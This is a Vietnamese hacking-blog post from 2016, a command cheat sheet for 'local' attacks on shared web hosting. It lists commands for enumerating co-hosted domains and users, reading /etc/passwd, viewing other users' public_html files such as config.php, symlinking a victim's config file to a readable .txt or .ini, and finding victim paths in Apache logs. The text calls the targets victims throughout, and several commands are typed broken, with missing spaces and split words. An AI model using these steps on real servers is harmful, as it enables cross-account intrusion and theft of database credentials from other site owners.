1) Xem list domain & user trên cùng sever

directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com
cd/etc/vdomainaliases;ls-lia
Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào
cd/etc/vdomainaliases && ls-lia

2)Xem tên user: tùy vào distro linux khác nhau sẽ có các câu lệnh đọc file khác nhau.

cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd r
ev /etc/passwd
xxd /etc/passwd

3)Local sang victim bằng lệnh dir ( 2013 - giờ hiếm server nào còn sài được)

dir /home/ten user can local/public_html
vd: dir /home/vhb/public_html

4)Xem nội dung file lệnh xem file cũng tương tự như mục số 2

-> có thể sài các lệnh đó thay thế cho cat, less,...
cat/home/ten user can local/public_html/index.php
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php

5) Symlink: tác dụng gần giống như tạo shorcut trên windows.

ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.

6) Tìm path của mấy victim sài Add on domain

find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'
----------------------------------------------

Tác giả: concobe - VHB Group

Facebook Google twitter
Từ khóa:
Cùng Chuyên Mục
Blogger Comments
Facebook Comments

Tin Tức Online
Xem Thêm Tất Cả »
Góc Chia Sẻ
Xem Thêm Tất Cả »
Game - Ứng Dụng Hay Tháng 8
Xem Thêm Tất Cả »
Góc Thư Giản
Xem Thêm Tất Cả »
Bài Viết Ngẫu Nhiên
Copyright © 2016 - All Rights Reserved
Template by Bùi Đạt - Powered by Blogger | SiteMap